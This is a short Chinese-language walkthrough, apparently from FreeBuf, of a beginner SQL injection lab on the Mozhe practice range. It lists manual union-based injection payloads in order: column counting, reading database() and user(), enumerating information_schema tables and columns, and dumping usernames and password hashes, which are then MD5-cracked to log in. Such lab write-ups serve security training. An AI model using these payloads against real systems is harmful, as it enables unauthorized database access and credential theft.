墨者SQL注入入门手测（MySQL） – 作者:可乐kele

1.打开靶场，看到停机维护点进去别有洞天

2.输入单引号发现报错    输入and 1=2

3.输入 ’ and ‘1’=’1   返回正常

4.判断列数，输入 ‘ order by 5 –+ 和 ‘ order by 4 –+ 发现第一个报错，第二个正常，则说明其有4列

5.采用联合查询(union select)，判断剩下其他信息

判断位置:数据库名，用户名

输入id=’ union select 1,2,3,4–+

输入：id=’ union select ‘1’,database(),user(),’4 {因为上步操作已经将位置暴露为2和3，所以我们在2和3的位置输入数据库和用户名即可 或者如下图一个一个输入也可}

id=’ union select ‘1’,’2′,database(),’4

id=’ union select ‘1’,’2′,user(),’4

猜解数据库中的表名：

‘ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()–+

查询数据库中的字段名：

‘ union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name=’stormgroup_member’–+

查询字段对应的值：

‘ union select 1,group_concat(name),group_concat(password),4 from stormgroup_member–+

6.进行MD5解密登录找到KEY

7.同时也可以采用sqlmap的方法

来源：freebuf.com 2021-04-09 17:15:42 by: 可乐kele